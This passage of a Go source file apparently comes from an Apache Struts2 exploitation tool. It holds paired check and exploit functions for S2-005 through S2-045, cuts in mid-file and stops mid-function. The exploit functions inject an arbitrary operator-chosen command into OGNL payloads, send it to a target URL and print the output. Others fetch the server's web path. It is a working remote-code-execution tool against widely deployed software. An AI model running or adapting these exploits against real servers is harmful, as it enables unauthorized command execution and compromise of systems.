 227 | 		resp, err = client.R().
 228 | 			SetBody(c.postData).
 229 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 230 | 			Post(c.Url)
 231 | 	} else {
 232 | 		resp, err = client.R().
 233 | 			SetBody(c.postData).
 234 | 			SetHeader("Content-Type", c.contentType).
 235 | 			Post(c.Url)
 236 | 	}
 237 | 	if err != nil {
 238 | 
 239 | 	}
 240 | 	if resp != nil {
 241 | 		fmt.Println(resp)
 242 | 	}
 243 | }
 244 | 
 245 | // PocS005 S2-005:影响版本Struts 2.0.0-2.1.8.1; GET请求发送数据;
 246 | func (c *WorkExp) PocS005() {
 247 | 	r1 := rand.Intn(10000) + 1000
 248 | 	r2 := rand.Intn(10000) + 1000
 249 | 	Payload := c.Url + utils.Exec_payload1
 250 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 251 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 252 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 253 | 	resp, err := client.R().
 254 | 		Get(Payload)
 255 | 	if err != nil {
 256 | 
 257 | 	}
 258 | 	if resp != nil {
 259 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 260 | 			fmt.Println("替换Payload在检测一次")
 261 | 		} else {
 262 | 			Payload = c.Url + utils.Exec_payload2
 263 | 			Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 264 | 			Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 265 | 			Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 266 | 			resp, err = client.R().
 267 | 				Get(Payload)
 268 | 			if err != nil {
 269 | 
 270 | 			}
 271 | 			if resp != nil {
 272 | 				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 273 | 					color.Red("*Found Struts2-005！")
 274 | 				} else {
 275 | 					fmt.Println("Struts2-005 Not Vulnerable.")
 276 | 				}
 277 | 			}
 278 | 		}
 279 | 	}
 280 | }
 281 | 
 282 | func (c *WorkExp) ExpS005Cmd() {
 283 | 	Payload := c.Url + utils.Exec_payload1
 284 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 285 | 	resp, err := client.R().
 286 | 		Get(Payload)
 287 | 	if err != nil {
 288 | 
 289 | 	}
 290 | 	if resp != nil {
 291 | 		fmt.Println(resp.String())
 292 | 	}
 293 | 
 294 | 	Payload = c.Url + utils.Exec_payload2
 295 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 296 | 	resp, err = client.R().
 297 | 		Get(Payload)
 298 | 	if err != nil {
 299 | 
 300 | 	}
 301 | 	if resp != nil {
 302 | 		fmt.Println(resp.String())
 303 | 	}
 304 | }
 305 | 
 306 | func (c *WorkExp) ExpS005GetPath() {
 307 | 	Payload := c.Url + utils.Web_path
 308 | 	resp, err := client.R().
 309 | 		Get(Payload)
 310 | 	if err != nil {
 311 | 
 312 | 	}
 313 | 	if resp != nil {
 314 | 		fmt.Println(resp.String())
 315 | 	}
 316 | }
 317 | 
 318 | // PocS007 S2-007:影响版本Struts 2.0.0-2.2.3; POST请求发送数据; 默认参数为:username,password;
 319 | func (c *WorkExp) PocS007() {
 320 | 	var (
 321 | 		resp *req.Response
 322 | 		err  error
 323 | 	)
 324 | 	r1 := rand.Intn(10000) + 1000
 325 | 	r2 := rand.Intn(10000) + 1000
 326 | 	Payload := strings.Replace(utils.ExecPayload007, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 327 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 328 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 329 | 	if c.postData == "" {
 330 | 		c.postData = "username=" + Payload
 331 | 	} else {
 332 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 333 | 	}
 334 | 	if c.contentType == "" {
 335 | 		resp, err = client.R().
 336 | 			SetBody(c.postData).
 337 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 338 | 			Post(c.Url)
 339 | 	} else {
 340 | 		resp, err = client.R().
 341 | 			SetBody(c.postData).
 342 | 			SetHeader("Content-Type", c.contentType).
 343 | 			Post(c.Url)
 344 | 	}
 345 | 	if err != nil {
 346 | 
 347 | 	}
 348 | 	if resp != nil {
 349 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 350 | 			color.Red("*Found Struts2-007！")
 351 | 		} else {
 352 | 			if c.postData == "" {
 353 | 				c.postData = "password=" + Payload
 354 | 			} else {
 355 | 				c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 356 | 			}
 357 | 			if c.contentType == "" {
 358 | 				resp, err = client.R().
 359 | 					SetBody(c.postData).
 360 | 					SetHeader("Content-Type", "application/x-www-form-urlencoded").
 361 | 					Post(c.Url)
 362 | 			} else {
 363 | 				resp, err = client.R().
 364 | 					SetBody(c.postData).
 365 | 					SetHeader("Content-Type", c.contentType).
 366 | 					Post(c.Url)
 367 | 			}
 368 | 			if err != nil {
 369 | 
 370 | 			}
 371 | 			if resp != nil {
 372 | 				if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 373 | 					color.Red("*Found Struts2-007！")
 374 | 				} else {
 375 | 					fmt.Println("Struts2-007 Not Vulnerable.")
 376 | 				}
 377 | 			}
 378 | 		}
 379 | 	}
 380 | }
 381 | 
 382 | func (c *WorkExp) ExpS007Cmd() {
 383 | 	var (
 384 | 		resp *req.Response
 385 | 		err  error
 386 | 	)
 387 | 	Payload := strings.Replace(utils.ExecPayload007, "{cmd}", c.Cmd, -1)
 388 | 	if c.postData == "" {
 389 | 		c.postData = "username=" + Payload
 390 | 	} else {
 391 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 392 | 	}
 393 | 	if c.contentType == "" {
 394 | 		resp, err = client.R().
 395 | 			SetBody(c.postData).
 396 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 397 | 			Post(c.Url)
 398 | 	} else {
 399 | 		resp, err = client.R().
 400 | 			SetBody(c.postData).
 401 | 			SetHeader("Content-Type", c.contentType).
 402 | 			Post(c.Url)
 403 | 	}
 404 | 	if err != nil {
 405 | 
 406 | 	}
 407 | 	if resp != nil {
 408 | 		fmt.Println(resp)
 409 | 	}
 410 | 
 411 | 	if c.postData == "" {
 412 | 		c.postData = "password=" + Payload
 413 | 	} else {
 414 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 415 | 	}
 416 | 	if c.contentType == "" {
 417 | 		resp, err = client.R().
 418 | 			SetBody(c.postData).
 419 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 420 | 			Post(c.Url)
 421 | 	} else {
 422 | 		resp, err = client.R().
 423 | 			SetBody(c.postData).
 424 | 			SetHeader("Content-Type", c.contentType).
 425 | 			Post(c.Url)
 426 | 	}
 427 | 	if err != nil {
 428 | 
 429 | 	}
 430 | 	if resp != nil {
 431 | 		fmt.Println(resp.String())
 432 | 	}
 433 | }
 434 | 
 435 | // PocS008 S2-008:影响版本Struts 2.1.0-2.3.1; GET请求发送数据;
 436 | func (c *WorkExp) PocS008() {
 437 | 	r1 := rand.Intn(10000) + 1000
 438 | 	r2 := rand.Intn(10000) + 1000
 439 | 	Payload := c.Url + utils.ExecPayload008
 440 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 441 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 442 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 443 | 	resp, err := client.R().
 444 | 		Get(Payload)
 445 | 	if err != nil {
 446 | 
 447 | 	}
 448 | 	if resp != nil {
 449 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 450 | 			color.Red("*Found Struts2-008！")
 451 | 		} else {
 452 | 			fmt.Println("Struts2-008 Not Vulnerable.")
 453 | 		}
 454 | 	}
 455 | }
 456 | 
 457 | func (c *WorkExp) ExpS008Cmd() {
 458 | 	Payload := c.Url + utils.ExecPayload008
 459 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 460 | 	resp, err := client.R().
 461 | 		Get(Payload)
 462 | 	if err != nil {
 463 | 
 464 | 	}
 465 | 	if resp != nil {
 466 | 		fmt.Println(resp.String())
 467 | 	}
 468 | }
 469 | 
 470 | // PocS009 S2-009:影响版本Struts 2.0.0-2.3.1.1; GET请求发送数据,URL后面需要请求参数名; 默认为: key;
 471 | func (c *WorkExp) PocS009() {
 472 | 	r1 := rand.Intn(10000) + 1000
 473 | 	r2 := rand.Intn(10000) + 1000
 474 | 	Payload := c.Url + utils.ExecPayload009
 475 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 476 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 477 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 478 | 	if c.postData == "" {
 479 | 		c.postData = "?key=" + Payload
 480 | 		c.Url = c.Url + c.postData
 481 | 	} else {
 482 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 483 | 		c.Url = c.Url + c.postData
 484 | 	}
 485 | 	resp, err := client.R().
 486 | 		Get(c.Url)
 487 | 	if err != nil {
 488 | 
 489 | 	}
 490 | 	if resp != nil {
 491 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 492 | 			color.Red("*Found Struts2-009！")
 493 | 		} else {
 494 | 			fmt.Println("Struts2-009 Not Vulnerable.")
 495 | 		}
 496 | 	}
 497 | }
 498 | 
 499 | func (c *WorkExp) ExpS009Cmd() {
 500 | 	Payload := c.Url + utils.ExecPayload009
 501 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 502 | 	resp, err := client.R().
 503 | 		Get(c.Url)
 504 | 	if err != nil {
 505 | 
 506 | 	}
 507 | 	if resp != nil {
 508 | 		fmt.Println(resp.String())
 509 | 	}
 510 | }
 511 | 
 512 | // PocS012 S2-012:影响版本Struts Showcase App 2.0.0-2.3.13; GET请求发送数据,参数直接添加到URL后面; 默认为:name; 支持任意命令执行;
 513 | func (c *WorkExp) PocS012() {
 514 | 	var (
 515 | 		resp *req.Response
 516 | 		err  error
 517 | 	)
 518 | 	r1 := rand.Intn(10000) + 1000
 519 | 	r2 := rand.Intn(10000) + 1000
 520 | 	Payload := strings.Replace(utils.ExecPayload012, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 521 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 522 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 523 | 	if c.postData == "" {
 524 | 		c.postData = "?name=" + Payload
 525 | 		c.Url = c.Url + c.postData
 526 | 	} else {
 527 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 528 | 		c.Url = c.Url + c.postData
 529 | 	}
 530 | 	resp, err = client.R().
 531 | 		Get(c.Url)
 532 | 	if err != nil {
 533 | 
 534 | 	}
 535 | 	if resp != nil {
 536 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 537 | 			color.Red("*Found Struts2-012！")
 538 | 		} else {
 539 | 			fmt.Println("Struts2-012 Not Vulnerable.")
 540 | 		}
 541 | 	}
 542 | }
 543 | 
 544 | func (c *WorkExp) ExpS012Cmd() {
 545 | 	var (
 546 | 		resp *req.Response
 547 | 		err  error
 548 | 	)
 549 | 	Payload := strings.Replace(utils.ExecPayload012, "{cmd}", c.Cmd, -1)
 550 | 	c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 551 | 	if c.contentType == "" {
 552 | 		resp, err = client.R().
 553 | 			SetBody(c.postData).
 554 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 555 | 			Post(c.Url)
 556 | 	} else {
 557 | 		resp, err = client.R().
 558 | 			SetBody(c.postData).
 559 | 			SetHeader("Content-Type", c.contentType).
 560 | 			Post(c.Url)
 561 | 	}
 562 | 	if err != nil {
 563 | 
 564 | 	}
 565 | 	if resp != nil {
 566 | 		fmt.Println(resp.String())
 567 | 	}
 568 | }
 569 | 
 570 | // PocS013 S2-013/S2-014:影响版本Struts 2.0.0-2.3.14.1; GET请求发送数据; 支持获取WEB路径,任意命令执行;
 571 | func (c *WorkExp) PocS013() {
 572 | 	r1 := rand.Intn(10000) + 1000
 573 | 	r2 := rand.Intn(10000) + 1000
 574 | 	Payload := c.Url + utils.ExecPayload013
 575 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 576 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 577 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 578 | 	resp, err := client.R().
 579 | 		Get(Payload)
 580 | 	if err != nil {
 581 | 
 582 | 	}
 583 | 	if resp != nil {
 584 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 585 | 			color.Red("*Found Struts2-013！")
 586 | 		} else {
 587 | 			fmt.Println("Struts2-013 Not Vulnerable.")
 588 | 		}
 589 | 	}
 590 | }
 591 | 
 592 | func (c *WorkExp) ExpS013Cmd() {
 593 | 	Payload := c.Url + utils.ExecPayload013
 594 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 595 | 	resp, err := client.R().
 596 | 		Get(Payload)
 597 | 	if err != nil {
 598 | 
 599 | 	}
 600 | 	if resp != nil {
 601 | 		fmt.Println(resp.String())
 602 | 	}
 603 | }
 604 | 
 605 | func (c *WorkExp) ExpS013GetPath() {
 606 | 	Payload := c.Url + utils.WebPath013
 607 | 	resp, err := client.R().
 608 | 		Get(Payload)
 609 | 	if err != nil {
 610 | 
 611 | 	}
 612 | 	if resp != nil {
 613 | 		fmt.Println(resp.String())
 614 | 	}
 615 | }
 616 | 
 617 | // PocS015 S2-015:影响版本Struts 2.0.0-2.3.14.2; GET请求发送数据; 支持获取WEB路径,任意命令执行
 618 | func (c *WorkExp) PocS015() {
 619 | 	r1 := rand.Intn(10000) + 1000
 620 | 	r2 := rand.Intn(10000) + 1000
 621 | 	Payload := c.Url + utils.ExecPayload015
 622 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 623 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 624 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 625 | 	resp, err := client.R().
 626 | 		Get(Payload)
 627 | 	if err != nil {
 628 | 
 629 | 	}
 630 | 	if resp != nil {
 631 | 		if strings.Contains(resp.String(), "6308") {
 632 | 			color.Red("*Found Struts2-015！")
 633 | 		} else {
 634 | 			fmt.Println("Struts2-015 Not Vulnerable.")
 635 | 		}
 636 | 	}
 637 | }
 638 | 
 639 | func (c *WorkExp) ExpS015Cmd() {
 640 | 	Payload := c.Url + utils.ExecPayload015
 641 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 642 | 	resp, err := client.R().
 643 | 		Get(Payload)
 644 | 	if err != nil {
 645 | 
 646 | 	}
 647 | 	if resp != nil {
 648 | 		fmt.Println(resp.String())
 649 | 	}
 650 | }
 651 | 
 652 | // PocS016 S2-016:影响版本Struts 2.0.0-2.3.15; GET请求发送数据; 支持获取WEB路径,任意命令执行; 支持任意命令执行;
 653 | // PocS016 目的url必须带action，比如：http://xxx.com/xxx.action
 654 | func (c *WorkExp) PocS016() {
 655 | 	r1 := rand.Intn(10000) + 1000
 656 | 	r2 := rand.Intn(10000) + 1000
 657 | 	Payload := c.Url + utils.ExecPayload016a
 658 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 659 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 660 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 661 | 	resp, err := client.R().
 662 | 		Get(Payload)
 663 | 	if err != nil {
 664 | 
 665 | 	}
 666 | 	if resp != nil {
 667 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 668 | 			color.Red("*Found Struts2-016！-> ExecPayload016a")
 669 | 		} else {
 670 | 			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016a ")
 671 | 		}
 672 | 	}
 673 | 
 674 | 	Payload = c.Url + utils.ExecPayload016b
 675 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 676 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 677 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 678 | 	resp, err = client.R().
 679 | 		Get(Payload)
 680 | 	if err != nil {
 681 | 
 682 | 	}
 683 | 	if resp != nil {
 684 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 685 | 			color.Red("*Found Struts2-016！-> ExecPayload016b")
 686 | 		} else {
 687 | 			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016b")
 688 | 		}
 689 | 	}
 690 | 
 691 | 	Payload = c.Url + utils.ExecPayload016c
 692 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 693 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 694 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 695 | 	resp, err = client.R().
 696 | 		Get(Payload)
 697 | 	if err != nil {
 698 | 
 699 | 	}
 700 | 	if resp != nil {
 701 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 702 | 			color.Red("*Found Struts2-016！-> ExecPayload016c")
 703 | 		} else {
 704 | 			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016c")
 705 | 		}
 706 | 	}
 707 | }
 708 | 
 709 | func (c *WorkExp) ExpS016Cmd() {
 710 | 	Payload := c.Url + utils.ExecPayload016a
 711 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 712 | 	resp, err := client.R().
 713 | 		Get(Payload)
 714 | 	if err != nil {
 715 | 
 716 | 	}
 717 | 	if resp != nil {
 718 | 		fmt.Println(resp.String())
 719 | 	}
 720 | 
 721 | 	Payload = c.Url + utils.ExecPayload016b
 722 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 723 | 	resp, err = client.R().
 724 | 		Get(Payload)
 725 | 	if err != nil {
 726 | 
 727 | 	}
 728 | 	if resp != nil {
 729 | 		fmt.Println(resp.String())
 730 | 	}
 731 | 
 732 | 	Payload = c.Url + utils.ExecPayload016c
 733 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 734 | 	resp, err = client.R().
 735 | 		Get(Payload)
 736 | 	if err != nil {
 737 | 
 738 | 	}
 739 | 	if resp != nil {
 740 | 		fmt.Println(resp.String())
 741 | 	}
 742 | }
 743 | 
 744 | func (c *WorkExp) ExpS016GetPath() {
 745 | 	Payload := c.Url + utils.WebPath016
 746 | 	resp, err := client.R().
 747 | 		Get(Payload)
 748 | 	if err != nil {
 749 | 
 750 | 	}
 751 | 	if resp != nil {
 752 | 		fmt.Println(resp.String())
 753 | 	}
 754 | }
 755 | 
 756 | // PocS019 S2-019:影响版本Struts 2.0.0-2.3.15.1; GET请求发送数据; 支持获取WEB路径,任意命令执行;
 757 | func (c *WorkExp) PocS019() {
 758 | 	r1 := rand.Intn(10000) + 1000
 759 | 	r2 := rand.Intn(10000) + 1000
 760 | 	reqUrl := c.Url + utils.ExecPayload019
 761 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 762 | 	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
 763 | 	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
 764 | 	resp, err := client.R().
 765 | 		Get(reqUrl)
 766 | 	if err != nil {
 767 | 
 768 | 	}
 769 | 	if resp != nil {
 770 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 771 | 			color.Red("*Found Struts2-019！")
 772 | 		} else {
 773 | 			fmt.Println("Struts2-019 Not Vulnerable.")
 774 | 		}
 775 | 	}
 776 | }
 777 | 
 778 | func (c *WorkExp) ExpS019Cmd() {
 779 | 	reqUrl := c.Url + utils.ExecPayload019
 780 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
 781 | 	resp, err := client.R().
 782 | 		Get(reqUrl)
 783 | 	if err != nil {
 784 | 
 785 | 	}
 786 | 	if resp != nil {
 787 | 		fmt.Println(resp.String())
 788 | 	}
 789 | }
 790 | 
 791 | func (c *WorkExp) ExpS019GetPath() {
 792 | 	Payload := c.Url + utils.WebPath019
 793 | 	resp, err := client.R().
 794 | 		Get(Payload)
 795 | 	if err != nil {
 796 | 
 797 | 	}
 798 | 	if resp != nil {
 799 | 		fmt.Println(resp.String())
 800 | 	}
 801 | }
 802 | 
 803 | // PocS029 S2-029:影响版本Struts 2.0.0-2.3.24.1(除了2.3.20.3); POST请求发送数据,需要参数; 默认参数:message; 支持任意命令执行;
 804 | func (c *WorkExp) PocS029() {
 805 | 	var (
 806 | 		resp *req.Response
 807 | 		err  error
 808 | 	)
 809 | 	r1 := rand.Intn(10000) + 1000
 810 | 	r2 := rand.Intn(10000) + 1000
 811 | 	Payload := strings.Replace(utils.ExecPayload029, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 812 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 813 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 814 | 	if c.postData == "" {
 815 | 		c.postData = "message=" + Payload
 816 | 	} else {
 817 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 818 | 	}
 819 | 	if c.contentType == "" {
 820 | 		resp, err = client.R().
 821 | 			SetBody(c.postData).
 822 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 823 | 			Post(c.Url)
 824 | 	} else {
 825 | 		resp, err = client.R().
 826 | 			SetBody(c.postData).
 827 | 			SetHeader("Content-Type", c.contentType).
 828 | 			Post(c.Url)
 829 | 	}
 830 | 	if err != nil {
 831 | 
 832 | 	}
 833 | 	if resp != nil {
 834 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 835 | 			color.Red("*Found Struts2-029！")
 836 | 		} else {
 837 | 			fmt.Println("Struts2-029 Not Vulnerable.")
 838 | 		}
 839 | 	}
 840 | }
 841 | 
 842 | func (c *WorkExp) ExpS029Cmd() {
 843 | 	var (
 844 | 		resp *req.Response
 845 | 		err  error
 846 | 	)
 847 | 	Payload := strings.Replace(utils.ExecPayload029, "{cmd}", c.Cmd, -1)
 848 | 	if c.postData == "" {
 849 | 		c.postData = "message=" + Payload
 850 | 	} else {
 851 | 		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
 852 | 	}
 853 | 	if c.contentType == "" {
 854 | 		resp, err = client.R().
 855 | 			SetBody(c.postData).
 856 | 			SetHeader("Content-Type", "application/x-www-form-urlencoded").
 857 | 			Post(c.Url)
 858 | 	} else {
 859 | 		resp, err = client.R().
 860 | 			SetBody(c.postData).
 861 | 			SetHeader("Content-Type", c.contentType).
 862 | 			Post(c.Url)
 863 | 	}
 864 | 	if err != nil {
 865 | 
 866 | 	}
 867 | 	if resp != nil {
 868 | 		fmt.Println(resp.String())
 869 | 	}
 870 | }
 871 | 
 872 | // PocS032 S2-032:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持获取WEB路径,任意命令执行;
 873 | func (c *WorkExp) PocS032() {
 874 | 	r1 := rand.Intn(10000) + 1000
 875 | 	r2 := rand.Intn(10000) + 1000
 876 | 	reqUrl := c.Url + utils.CheckPoc032
 877 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 878 | 	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
 879 | 	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
 880 | 	resp, err := client.R().
 881 | 		Get(reqUrl)
 882 | 	if err != nil {
 883 | 
 884 | 	}
 885 | 	if resp != nil {
 886 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 887 | 			color.Red("*Found Struts2-032！")
 888 | 		} else {
 889 | 			fmt.Println("Struts2-032 Not Vulnerable.")
 890 | 		}
 891 | 	}
 892 | }
 893 | 
 894 | func (c *WorkExp) ExpS032Cmd() {
 895 | 	reqUrl := c.Url + utils.ExecPayload032
 896 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
 897 | 	resp, err := client.R().
 898 | 		Get(reqUrl)
 899 | 	if err != nil {
 900 | 
 901 | 	}
 902 | 	if resp != nil {
 903 | 		fmt.Println(resp.String())
 904 | 	}
 905 | }
 906 | 
 907 | func (c *WorkExp) ExpS032GetPath() {
 908 | 	reqUrl := c.Url + utils.WebPath032
 909 | 	resp, err := client.R().
 910 | 		Get(reqUrl)
 911 | 	if err != nil {
 912 | 
 913 | 	}
 914 | 	if resp != nil {
 915 | 		fmt.Println(resp.String())
 916 | 	}
 917 | }
 918 | 
 919 | // PocS033 S2-033:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持任意命令执行;
 920 | func (c *WorkExp) PocS033() {
 921 | 	r1 := rand.Intn(10000) + 1000
 922 | 	r2 := rand.Intn(10000) + 1000
 923 | 	reqUrl := c.Url + utils.CheckPoc033
 924 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 925 | 	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
 926 | 	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
 927 | 	resp, err := client.R().
 928 | 		Get(reqUrl)
 929 | 	if err != nil {
 930 | 
 931 | 	}
 932 | 	if resp != nil {
 933 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 934 | 			color.Red("*Found Struts2-033！")
 935 | 		} else {
 936 | 			fmt.Println("Struts2-033 Not Vulnerable.")
 937 | 		}
 938 | 	}
 939 | }
 940 | 
 941 | func (c *WorkExp) ExpS033Cmd() {
 942 | 	reqUrl := c.Url + utils.ExecPayload033
 943 | 	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
 944 | 	resp, err := client.R().
 945 | 		Get(reqUrl)
 946 | 	if err != nil {
 947 | 
 948 | 	}
 949 | 	if resp != nil {
 950 | 		fmt.Println(resp.String())
 951 | 	}
 952 | }
 953 | 
 954 | // PocS037 S2-037:影响版本Struts 2.3.20-2.3.28.1; GET请求发送数据; 支持获取WEB路径,任意命令执行;
 955 | func (c *WorkExp) PocS037() {
 956 | 	r1 := rand.Intn(10000) + 1000
 957 | 	r2 := rand.Intn(10000) + 1000
 958 | 	Payload := c.Url + utils.ExecPayload037
 959 | 	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
 960 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
 961 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
 962 | 	resp, err := client.R().
 963 | 		Get(Payload)
 964 | 	if err != nil {
 965 | 
 966 | 	}
 967 | 	if resp != nil {
 968 | 		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
 969 | 			color.Red("*Found Struts2-037！")
 970 | 		} else {
 971 | 			fmt.Println("Struts2-037 Not Vulnerable.")
 972 | 		}
 973 | 	}
 974 | }
 975 | 
 976 | func (c *WorkExp) ExpS037Cmd() {
 977 | 	Payload := c.Url + utils.ExecPayload037
 978 | 	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
 979 | 	resp, err := client.R().
 980 | 		Get(Payload)
 981 | 	if err != nil {
 982 | 
 983 | 	}
 984 | 	if resp != nil {
 985 | 		fmt.Println(resp.String())
 986 | 	}
 987 | }
 988 | 
 989 | func (c *WorkExp) ExpS037GetPath() {
 990 | 	Payload := c.Url + utils.WebPath037
 991 | 	resp, err := client.R().
 992 | 		Get(Payload)
 993 | 	if err != nil {
 994 | 
 995 | 	}
 996 | 	if resp != nil {
 997 | 		fmt.Println(resp.String())
 998 | 	}
 999 | }
1000 | 
1001 | // PocS045 S2-045:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行;
1002 | func (c *WorkExp) PocS045() {
1003 | 	var (
1004 | 		resp *req.Response
1005 | 		err  error
1006 | 	)
1007 | 	r1 := rand.Intn(10000) + 1000
1008 | 	r2 := rand.Intn(10000) + 1000
1009 | 	Payload := strings.Replace(utils.ExecPayload045, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
1010 | 	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
1011 | 	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
1012 | 
1013 | 	if c.contentType == "" {
1014 | 		resp, err = client.R().
1015 | 			SetBody(c.postData).
1016 | 			SetHeader("Content-Type", Payload).
1017 | 			Post(c.Url)
1018 | 	}
1019 | 	if err != nil {
1020 | 
1021 | 	}
1022 | 	if resp != nil {
